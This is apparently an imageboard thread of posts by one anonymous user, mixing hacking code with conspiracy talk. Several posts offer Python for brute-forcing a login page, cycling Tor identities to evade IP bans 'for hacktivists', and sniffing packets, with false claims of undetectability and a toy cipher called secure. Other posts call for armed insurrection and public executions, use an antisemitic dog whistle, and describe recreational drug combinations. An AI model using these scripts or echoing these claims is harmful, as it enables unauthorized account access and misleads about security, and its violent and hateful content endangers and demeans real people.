Anonymous ID: 03f1a5 April 9, 2023, 9:24 a.m. No.18666363   🗄️.is 🔗kun   >>6445 >>6693 >>6998 >>7099

>>18666319

FOR AUTISTS

if there are any left here….

 

here is an example of how I might go about creating a multidimensional encryption with secure mechanisms around it, in the coding language Python, for any interested computer people.

 

python

def encrypt(message, key):

n = len(message)

m = len(message[0])

encrypted_message = [['' for _ in range(m)] for _ in range(n)] #initialize the multidimensional array

for i in range(n):

for j in range(m):

encrypted_message[i][j] = chr(ord(message[i][j]) + key[i % len(key)]) #encrypt each character based on the key

return encrypted_message

 

def decrypt(encrypted_message, key):

n = len(encrypted_message)

m = len(encrypted_message[0])

decrypted_message = [['' for _ in range(m)] for _ in range(n)] #initialize the multidimensional array

for i in range(n):

for j in range(m):

decrypted_message[i][j] = chr(ord(encrypted_message[i][j]) - key[i % len(key)]) #decrypt each character based on the key

return decrypted_message

 

 

The encrypt function takes in a two-dimensional message array and a one-dimensional key array. It then loops through each character of the message array and encrypts it based on the corresponding element in the key array. The encrypted characters are then stored in a multidimensional encrypted message array, which is returned as the output.

 

The decrypt function takes in the encrypted message array and the one-dimensional key array. It then loops through each character of the encrypted message array and decrypts it based on the corresponding element in the key array. The decrypted characters are then stored in a multidimensional decrypted message array, which is returned as the output.

 

Note that this is just an example of the idea.

Anonymous ID: 03f1a5 April 9, 2023, 9:26 a.m. No.18666371   🗄️.is 🔗kun

>>18666319

FOR CODERS

if there are any of those here

 

Let's talk brute forcing techniques in hacking, and how we do it.

 

For "research" purposes only, I'm providing you all a generic code example to teach you about brute forcing techniques (that you can adapt easily).

 

Here is an extremely basic Python code example:

 

python

import itertools

import requests

 

characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

url = 'http://example.com/login.php'

 

for length in range(1, 15):

for combination in itertools.product(characters, repeat=length):

password = ''.join(combination)

data = {'username': 'example', 'password': password}

 

try:

response = requests.post(url, data=data)

except requests.exceptions.RequestException:

print('Error sending request')

continue

 

if 'Login failed' not in response.text:

print('Password found: ' + password)

break

 

 

This code attempts to brute force a login page by iterating through every possible combination of characters up to a length of 15. The code uses the requests library to send HTTP POST requests to the target login page with the generated credentials.

 

By analyzing the response text of the login page, the code tries to determine whether the login is successful or not. If the login is successful, the password is printed to the console.

 

This set doesn't include special characters in the set, but you can easily add them to the example and adapt it quickly.

Anonymous ID: 03f1a5 April 9, 2023, 9:27 a.m. No.18666375   🗄️.is 🔗kun   >>6432

>>18666319

FOR WANNABE HACTIVISTS

if there are any of those around

 

Of course.

If you did this properly and used a terminal or PVM, your IP would be filtered and banned nearly instantly.

 

And that is where you, as a budding hacktivist, might need a bit of code to avoid detection.

 

And that might -for "research" purposes- look exactly like this in a Python environment:

 

import time

import random

import requests

from stem.util.log import get_logger

from stem import Signal

from stem.control import Controller

 

def switch_IP():

with Controller.from_port(port = 9051) as controller:

controller.authenticate(password = 'YourPassword')

controller.signal(Signal.NEWNYM)

 

def brute_force(url, payload):

IP_LIST = ['1.1.1.1', '2.2.2.2', '3.3.3.3'] #IP addresses to cycle through

MAX_REQUESTS = 10 # amount of requests before switching IP

request_count = 0

 

while True:

IP = random.choice(IP_LIST) # choose a random IP address from the list

switch_IP() # switch to a new IP address

session = requests.session()

session.proxies = {'http': IP}

try:

response = session.get(url, data=payload)

if response.status_code == 200:

print('Successful request from IP:', IP)

elif response.status_code == 403 and 'Rate limit' in response.text:

print('Rate limit reached, switching IP…')

time.sleep(5) # wait for 5 seconds and continue to cycle IP

continue

except requests.exceptions.RequestException as e:

print('Error requesting data:', e)

continue

 

request_count += 1 # count number of requests made with the current IP

if request_count >= MAX_REQUESTS:

print('Maximum requests reached, switching IP…')

time.sleep(5) # wait for 5 seconds before switching IP

request_count = 0

continue

 

# usage example

URL = 'http://example.com'

PAYLOAD = {'username': 'admin', 'password': 'admin'}

brute_force(URL, PAYLOAD)

 

This code uses the Stem package to cycle through a list of IP addresses, switching to a new IP after a set number of requests. This will help the user bypass IP filters when brute-forcing in Python. The code is complex in nature and effective in cycling the IP address to avoid detection and is easily adaptable like the basic front code.

 

Happy hacking

Anonymous ID: 03f1a5 April 9, 2023, 9:28 a.m. No.18666380   🗄️.is 🔗kun   >>6501

>>18666319

JUST FOR "RESEARCH PURPOSES," YOU UNDERSTAND…

 

Finally, one more fundamental tool for any budding hacktivist out there.

Of course just for "research".

 

How to sniff data properly. This is extremely important to understand if you want to capture secrets or snoop on things without being caught the moment you try.

 

So here is a short example of exactly how you might go about that.

 

import socket

from scapy.config import conf

conf.ipv6_enabled = False

from scapy.all import *

 

def sniff_data(source_ip, source_port, destination_ip, destination_port, number_of_packets):

# Set filter to look for packets coming from the source and going to the destination

filter = "host " + source_ip + " and host " + destination_ip + " and port " + str(source_port) + " and port " + str(destination_port)

 

# Use a custom interface to receive packets

interface = "eth0"

 

# Sniff the packets and store them in a list.

packets = sniff(filter=filter, count=number_of_packets, iface=interface)

 

# Extract the payload data from the packets and print it out.

for packet in packets:

payload = str(packet.getlayer(Raw))

print(payload)

 

def main():

# Set source and destination data

source_ip = "10.10.10.10"

source_port = 80

destination_ip = "192.168.1.1"

destination_port = 443

number_of_packets = 10

 

# Start sniffing

sniff_data(source_ip, source_port, destination_ip, destination_port, number_of_packets)

 

if name == 'main':

main()

 

This program sniffs data from a source server without detection. By using the Scapy package, we can craft a custom filter to capture specific packets from a given source IP address and destination IP address. Furthermore, the program uses a custom interface to receive packets and extracts the payload data from them, while leaving no trace of activity. This makes it difficult for typical detection tools to track your presence.

 

Happy Hacking

Anonymous ID: 03f1a5 April 9, 2023, 9:34 a.m. No.18666393   🗄️.is 🔗kun   >>6406

>>18666373

>Why would anyone trust a known lying billionaire superstar member of the cult?

 

VALID QUESTION

i have vacillated on this over the past couple of yrs… the only sensible reason i can come up with is the "enemy of my enemy" theory.

TPTB works so relentlessly to smear, discredit, disrespect, and destroy him thru character assassination, the he must pose a threat to them.

of course, there's the possibility that (((they))) are doing that just to convince folks like me that DJT isn't really one of them.

Anonymous ID: 03f1a5 April 9, 2023, 9:44 a.m. No.18666433   🗄️.is 🔗kun

>>18666406

>and its mostly working.

for now i will continue to play the waiting game. some of us been doing that since nov '63, so at this point, it's a small incremental delay.

the only "draining the swamp" i will trust unconditionally will be armed insurrection by the masses and very public executions.

Anonymous ID: 03f1a5 April 9, 2023, 9:53 a.m. No.18666470   🗄️.is 🔗kun   >>6476 >>6483

>>18666319

mRNA CLOTSHOTS FOR COWS IS FEAR PORN

 

Clearing up another fake story circulating the retweet mills.

 

There are currently no mRNA vaccines approved for cattle in the U.S.

 

Stories claiming that such things are in use or are being deployed for active use are incorrect*

 

0 vaccines given to cattle in the United States contain mRNA technology.

 

https://t.me/s/TheOfficialE

 

i have repeatedly told anons here that it would be physically impossible to get the clotshot into people by putting it in livestock.

use your damned head…. if it were physically possible to give the nRNA orally, WHY DID THEY MAKE IT A SHOT IN THE FIRST PLACE?

it's just common sense there would be much more resistance to getting jabbed than to swallowing a pill.

same reason people who take insulin have to inject it… the functionality of large biological molecules does NOT survive digestion.

 

I FUCKING TOADASO

Anonymous ID: 03f1a5 April 9, 2023, 10:06 a.m. No.18666515   🗄️.is 🔗kun   >>6542

>>18666319

over 60% of pro-ukraine/pro-war twatter accts list langley VA as their location

 

I was looking through the Twitter locations of accounts with Ukrainian flags that are the most actively engaged on social media.

 

What I found was that over 60% of pro-war/pro-UKR accounts list Langley, VA, aka CIA headquarters as their location.

 

https://t.me/TheOfficialE/3676

Anonymous ID: 03f1a5 April 9, 2023, 10:14 a.m. No.18666553   🗄️.is 🔗kun   >>6814 >>6882

>>18666319

Budweiser Replaces Clydesdales With Cows Dressed As Horses

 

ST. LOUIS, MO — In a natural continuation of its push for diversity and celebration of transgender lifestyles, Anheuser-Busch has announced the company will be replacing the iconic Budweiser Clydesdales with cows that identify as and dress like horses.

 

"We feel this is a natural next step," said Anheuser-Busch CEO Brandan Whitworth. "If we're going to bend reality and ignore all basic understanding of science and biology with our Bud Light brand, then it only makes sense to make that philosophy consistent across our other brands, including the classic Budweiser advertising campaigns."

 

The beverage giant scoured the nation in search of dairy cows that live their lives as horses. "I was very excited to receive a phone call from the Budweiser marketing folks," said dairy farmer Ed Herman. "I just can't get this group of cows to produce any milk because they insist on pretending to be horses. I was ready to put down the whole lot of ‘em, but now they can actually make me some money with this ad campaign."

 

Budweiser marketing executives have mapped out an extensive campaign that will culminate in an emotionally stirring commercial during next year's Super Bowl broadcast. "We really want to tug on everyone's heartstrings," said the company's marketing spokesperson Katie MacDonell. "We're absolutely certain that everyone in the country will be excited to follow the journey these proud horses embark on to discover their true inner species."

 

At publishing time, Anheuser-Busch was reportedly also in discussions to replace the famous "Bud-Weis-Errrrrr" frogs with a group of gay frogs that were spoken about by conservative media personality Alex Jones.

 

https://babylonbee.com/news/budweiser-replaces-clydesdales-with-cows-dressed-as-horses

Anonymous ID: 03f1a5 April 9, 2023, 10:56 a.m. No.18666799   🗄️.is 🔗kun   >>6804 >>6998 >>7099

>>18666319

Norfolk Southern train cars derail in Pittsburgh

 

(to keep this in perspective, 4-5 train derailments occur EVERY DAY in the US)

 

PITTSBURGH — Norfolk Southern train cars have derailed in Pittsburgh.

 

According to a company spokesperson, five empty steel cars derailed.

PHOTOS: Norfolk Southern train cars derail in Pittsburgh

 

A 911 dispatcher said police, fire and EMS were initially called to the city’s Marshall-Shadeland neighborhood, on Brunot Island off Ohio River Boulevard. Traffic was impacted in the city’s Esplen and Elliott neighborhoods, along West Carson Street, where police say they responded to the incident.

 

There was no hazardous material involved, and the cars stayed upright, according to the Norfolk Southern spokesperson.

 

ALERT: Crews are currently on-scene of a five car train derailment in the area of Telford Street and West Carson St. The cars were empty and there are no hazards or injuries at this time.

W. Carson is closed between Corliss Tunnel and McKees Rocks Plaza. pic.twitter.com/G73TeZvnpu

— Pittsburgh Public Safety (@PghPublicSafety) April 8, 2023

 

Cleanup ongoing after a @nscorp train derailed in Pittsburgh’s Esplen neighborhood.

 

No hazardous material involved. pic.twitter.com/yrIVfq306k

— Rich Pierce (@RichPierceWPXI) April 8, 2023

 

Crews were through most of Sunday to clear the cars.

 

West Carson Street from Corliss Street to the McKees Rocks Plaza was closed for hours.

 

The National Transportation Safety Board said they will not be investigating this incident.

 

[video]

 

https://www.wpxi.com/news/local/norfolk-southern-train-derails-pittsburgh/QAKEEDO7XFG2BMSHVZPM5XWHII/

Anonymous ID: 03f1a5 April 9, 2023, 11:09 a.m. No.18666852   🗄️.is 🔗kun

today, we will celebrate the resurrection of Jesus by slaughtering a pig, fashioning its skin into a prolate spheroid, give it a blow job, then watch as 22 fearsome men beat each other to a pulp trying to shove it into their opponents endzone.

ain't muriKa grand?

Anonymous ID: 03f1a5 April 9, 2023, 11:28 a.m. No.18666928   🗄️.is 🔗kun

>>18666687

>carisoprodol

Combining a muscle relaxant like carisoprodol with opioids and benzodiazepines is referred to as "The Holy Trinity" as it has been reported to increase the power of the "high".[21]

 

Recreational users of carisoprodol usually seek its potentially heavy sedating, relaxant, and anxiolytic effects.[22] Also, because of its potentiating effects on narcotics, it is often used in conjunction with many opioid drugs. Also it is not detected on standard drug testing screens. On 26 March 2010 the DEA issued a Notice of Hearing on proposed rule making in respect to the placement of carisoprodol in schedule IV of the Controlled Substances Act.[23] The DEA ended up classifying it under schedule IV.[24] Carisoprodol is sometimes mixed with date rape drugs.[25]

 

Many overdoses have resulted from recreational users combining these drugs to combine their individual effects without being aware of the enzyme-induction induced potentiation